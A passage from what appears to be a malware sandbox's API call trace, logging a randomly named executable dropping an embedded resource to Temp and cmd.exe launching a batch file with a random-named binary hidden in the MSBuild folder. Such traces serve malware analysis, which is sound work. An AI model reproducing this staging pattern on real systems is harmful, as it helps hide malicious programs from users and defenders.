lpProcName="GetCurrentPackageId") returned 0x74de3c90 [0273.743] GetProcAddress (hModule=0x75130000, lpProcName="GetTickCount64") returned 0x75148710 [0273.743] GetProcAddress (hModule=0x75130000, lpProcName="GetFileInformationByHandleExW") returned 0x0 [0273.743] GetProcAddress (hModule=0x75130000, lpProcName="SetFileInformationByHandleW") returned 0x0 [0273.743] GetCurrentThreadId () returned 0x120 [0273.743] GetStartupInfoW (in: lpStartupInfo=0x19fed0 | out: lpStartupInfo=0x19fed0*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="vIDhS3md.exe -accepteula -c -y -p handles -nobanner", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x40ad42, hStdOutput=0x2bf53382, hStdError=0x475810)) [0273.743] GetStdHandle (nStdHandle=0xfffffff6) returned 0x38 [0273.743] GetFileType (hFile=0x38) returned 0x2 [0273.743] GetStdHandle (nStdHandle=0xfffffff5) returned 0x3c [0273.743] GetFileType (hFile=0x3c) returned 0x2 [0273.743] GetStdHandle (nStdHandle=0xfffffff4) returned 0x40 [0273.743] GetFileType (hFile=0x40) returned 0x2 [0273.743] GetCommandLineW () returned="vIDhS3md.exe -accepteula -c -y -p handles -nobanner" [0273.743] GetEnvironmentStringsW () returned 0x501e08* [0273.744] FreeEnvironmentStringsW (penv=0x501e08) returned 1 [0273.744] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x426ea0, nSize=0x104 | out: lpFilename="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\vIDhS3md.exe" (normalized: "c:\\users\\ciihmnxmn6ps\\desktop\\vidhs3md.exe")) returned 0x2a [0273.744] GetLastError () returned 0x0 [0273.745] SetLastError (dwErrCode=0x0) [0273.745] GetLastError () returned 0x0 [0273.745] SetLastError (dwErrCode=0x0) [0273.745] GetLastError () returned 0x0 [0273.745] SetLastError (dwErrCode=0x0) [0273.745] GetACP () returned 0x4e4 [0273.745] GetLastError () returned 0x0 [0273.745] SetLastError (dwErrCode=0x0) [0273.745] IsValidCodePage (CodePage=0x4e4) returned 1 [0273.745] GetCPInfo (in: CodePage=0x4e4, lpCPInfo=0x19fec4 | out: lpCPInfo=0x19fec4) returned 1 [0273.745] GetCPInfo (in: CodePage=0x4e4, lpCPInfo=0x19f98c | out: lpCPInfo=0x19f98c) returned 1 [0273.745] GetLastError () returned 0x0 [0273.745] SetLastError (dwErrCode=0x0) [0273.745] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x19fda0, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0273.745] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x19fda0, cbMultiByte=256, lpWideCharStr=0x19f708, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿȀ") returned 256 [0273.745] GetStringTypeW (in: dwInfoType=0x1, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿȀ", cchSrc=256, lpCharType=0x19f9a0 | out: lpCharType=0x19f9a0) returned 1 [0273.745] GetLastError () returned 0x0 [0273.745] SetLastError (dwErrCode=0x0) [0273.745] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x19fda0, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0273.745] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x19fda0, cbMultiByte=256, lpWideCharStr=0x19f6d8, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿȀ") returned 256 [0273.745] LCMapStringEx (in: lpLocaleName=0x0, dwMapFlags=0x100, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿȀ", cchSrc=256, lpDestStr=0x0, cchDest=0, lpVersionInformation=0x0, lpReserved=0x0, lParam=0x0 | out: lpDestStr=0x0) returned 256 [0273.745] LCMapStringEx (in: lpLocaleName=0x0, dwMapFlags=0x100, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿȀ", cchSrc=256, lpDestStr=0x19f4c8, cchDest=256, lpVersionInformation=0x0, lpReserved=0x0, lParam=0x0 | out: lpDestStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰š‹œ\x8dž\x8f\x90‘’“”•–—˜™š›œ\x9džÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿȀ") returned 256 [0273.745] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰š‹œ\x8dž\x8f\x90‘’“”•–—˜™š›œ\x9džÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿȀ", cchWideChar=256, lpMultiByteStr=0x19fca0, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x20\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x0d\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f\x20\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b\x3c\x3d\x3e\x3f\x40\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x5b\x5c\x5d\x5e\x5f\x60\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x7b\x7c\x7d\x7e\x7f\x80\x81\x82\x83\x84\x85\x86\x87\x88\x89\x9a\x8b\x9c\x8d\x9e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\xff\xa0\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xd7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xdf\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff\x20\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x0d\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f\x20\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b\x3c\x3d\x3e\x3f\x40\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x4b\x4c\x4d\x4e\x4f\x50\x51\x52\x53\x54\x55\x56\x57\x58\x59\x5a\x5b\x5c\x5d\x5e\x5f\x60\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x7b\x7c\x7d\x7e\x7f\x80\x81\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f\xa0\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xc0\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0\xd1\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff\x12\x32\xf5\x2b\xdc\xfe\x19", lpUsedDefaultChar=0x0) returned 256 [0273.745] GetLastError () returned 0x0 [0273.745] SetLastError (dwErrCode=0x0) [0273.745] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x19fda0, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0273.745] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x19fda0, cbMultiByte=256, lpWideCharStr=0x19f6f8, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ@Ā") returned 256 [0273.745] LCMapStringEx (in: lpLocaleName=0x0, dwMapFlags=0x200, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ@Ā", cchSrc=256, lpDestStr=0x0, cchDest=0, lpVersionInformation=0x0, lpReserved=0x0, lParam=0x0 | out: lpDestStr=0x0) returned 256 [0273.745] LCMapStringEx (in: lpLocaleName=0x0, dwMapFlags=0x200, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ@Ā", cchSrc=256, lpDestStr=0x19f4e8, cchDest=256, lpVersionInformation=0x0, lpReserved=0x0, lParam=0x0 | out: lpDestStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f€\x81‚Ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™Š›Œ\x9dŽŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞŸȀ") returned 256 [0273.745] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f€\x81‚Ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™Š›Œ\x9dŽŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞŸȀ", cchWideChar=256, lpMultiByteStr=0x19fba0, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x20\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x0d\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f\x20\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b\x3c\x3d\x3e\x3f\x40\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x4b\x4c\x4d\x4e\x4f\x50\x51\x52\x53\x54\x55\x56\x57\x58\x59\x5a\x5b\x5c\x5d\x5e\x5f\x60\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x4b\x4c\x4d\x4e\x4f\x50\x51\x52\x53\x54\x55\x56\x57\x58\x59\x5a\x7b\x7c\x7d\x7e\x7f\x80\x81\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x8a\x9b\x8c\x9d\x8e\x9f\xa0\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xc0\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0\xd1\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf\xc0\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0\xd1\xd2\xd3\xd4\xd5\xd6\xf7\xd8\xd9\xda\xdb\xdc\xdd\xde\x9f\x20\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x0d\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f\x20\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b\x3c\x3d\x3e\x3f\x40\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x5b\x5c\x5d\x5e\x5f\x60\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x7b\x7c\x7d\x7e\x7f\x80\x81\x82\x83\x84\x85\x86\x87\x88\x89\x9a\x8b\x9c\x8d\x9e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\xff\xa0\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xd7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xdf\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff\x20\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x0d\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f\x20\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b\x3c\x3d\x3e\x3f\x40\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x4b\x4c\x4d\x4e\x4f\x50\x51\x52\x53\x54\x55\x56\x57\x58\x59\x5a\x5b\x5c\x5d\x5e\x5f\x60\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x7b\x7c\x7d\x7e\x7f\x80\x81\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f\xa0\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xc0\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0\xd1\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff\x12\x32\xf5\x2b\xdc\xfe\x19", lpUsedDefaultChar=0x0) returned 256 [0273.745] IsProcessorFeaturePresent (ProcessorFeature=0xa) returned 1 [0273.745] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x40f584) returned 0x0 [0273.746] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x75130000 [0273.840] GetProcAddress (hModule=0x75130000, lpProcName="IsWow64Process") returned 0x751496e0 [0273.840] GetCurrentProcess () returned 0xffffffff [0273.840] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x19ff2c | out: Wow64Process=0x19ff2c) returned 1 [0273.840] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x19fd20, nSize=0x104 | out: lpFilename="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\vIDhS3md.exe" (normalized: "c:\\users\\ciihmnxmn6ps\\desktop\\vidhs3md.exe")) returned 0x2a [0273.840] ExpandEnvironmentStringsW (in: lpSrc="%TEMP%", lpDst=0x19fb18, nSize=0x104 | out: lpDst="C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp") returned 0x25 [0273.840] FindResourceW (hModule=0x0, lpName="RCHANDLE64", lpType="BINRES") returned 0x476060 [0273.840] LoadResource (hModule=0x0, hResInfo=0x476060) returned 0x43c648 [0273.840] SizeofResource (hModule=0x0, hResInfo=0x476060) returned 0x37490 [0273.840] LockResource (hResData=0x43c648) returned 0x43c648 [0273.841] GetCurrentPackageId () returned 0x3d54 [0273.841] CreateFileW (lpFileName="C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp\\vIDhS3md64.exe" (normalized: "c:\\users\\ciihmn~1\\appdata\\local\\temp\\vidhs3md64.exe"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x19f954, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0276.500] GetLastError () returned 0x20 [0276.500] GetLastError () returned 0x20 [0276.500] SetLastError (dwErrCode=0x20) [0276.500] GetLastError () returned 0x20 [0276.500] SetLastError (dwErrCode=0x20) [0276.500] GetLastError () returned 0x20 [0276.500] SetLastError (dwErrCode=0x20) [0276.500] GetLastError () returned 0x20 [0276.500] SetLastError (dwErrCode=0x20) [0276.501] GetLastError () returned 0x20 [0276.501] SetLastError (dwErrCode=0x20) [0276.501] GetLastError () returned 0x20 [0276.501] SetLastError (dwErrCode=0x20) [0276.501] GetLastError () returned 0x20 [0276.501] SetLastError (dwErrCode=0x20) [0276.501] GetConsoleMode (in: hConsoleHandle=0x3c, lpMode=0x19e384 | out: lpMode=0x19e384) returned 1 [0277.601] WriteFile (in: hFile=0x3c, lpBuffer=0x19ea60*, nNumberOfBytesToWrite=0x49, lpNumberOfBytesWritten=0x19e38c, lpOverlapped=0x0 | out: lpBuffer=0x19ea60*, lpNumberOfBytesWritten=0x19e38c*=0x49, lpOverlapped=0x0) returned 1 [0277.788] GetModuleHandleExW (in: dwFlags=0x0, lpModuleName="mscoree.dll", phModule=0x19fed4 | out: phModule=0x19fed4) returned 0 [0277.788] ExitProcess (uExitCode=0x1) Thread: id = 891 os_tid = 0x700 Process: id = "105" image_name = "cmd.exe" filename = "c:\\windows\\syswow64\\cmd.exe" page_root = "0x227d0000" os_pid = "0xf4c" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "1" os_parent_pid = "0xbd0" cmd_line = "C:\\Windows\\system32\\cmd.exe /c \"\"C:\\Users\\CIiHmnxMn6Ps\\Desktop\\vRnqNMBW.bat\" \"C:\\Program Files\\MSBuild\\expenditurevincenttablet.exe\"\"" cur_dir = "C:\\Users\\CIiHmnxMn6Ps\\Desktop\\" os_username = "LHNIWSJ\\CIiHmnxMn6Ps" os_groups = "LHNIWSJ\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:00013c81" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 7623 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 7624 start_va = 0x30000 end_va = 0x31fff entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 7625 start_va = 0x40000 end_va = 0x53fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 7626 start_va = 0x60000 end_va = 0x9ffff entry_point = 0x0 region_type = private name = "private_0x0000000000060000" filename = "" Region: id = 7627 start_va = 0xa0000 end_va = 0x19ffff entry_point = 0x0 region_type = private name = "private_0x00000000000a0000" filename = "" Region: id = 7628 start_va = 0x1a0000 end_va = 0x1a3fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001a0000" filename = "" Region: id = 7629 start_va = 0x13d0000 end_va = 0x141ffff entry_point = 0x13d0000 region_type = mapped_file name = "cmd.exe" filename = "\\Windows\\SysWOW64\\cmd.exe" (normalized: 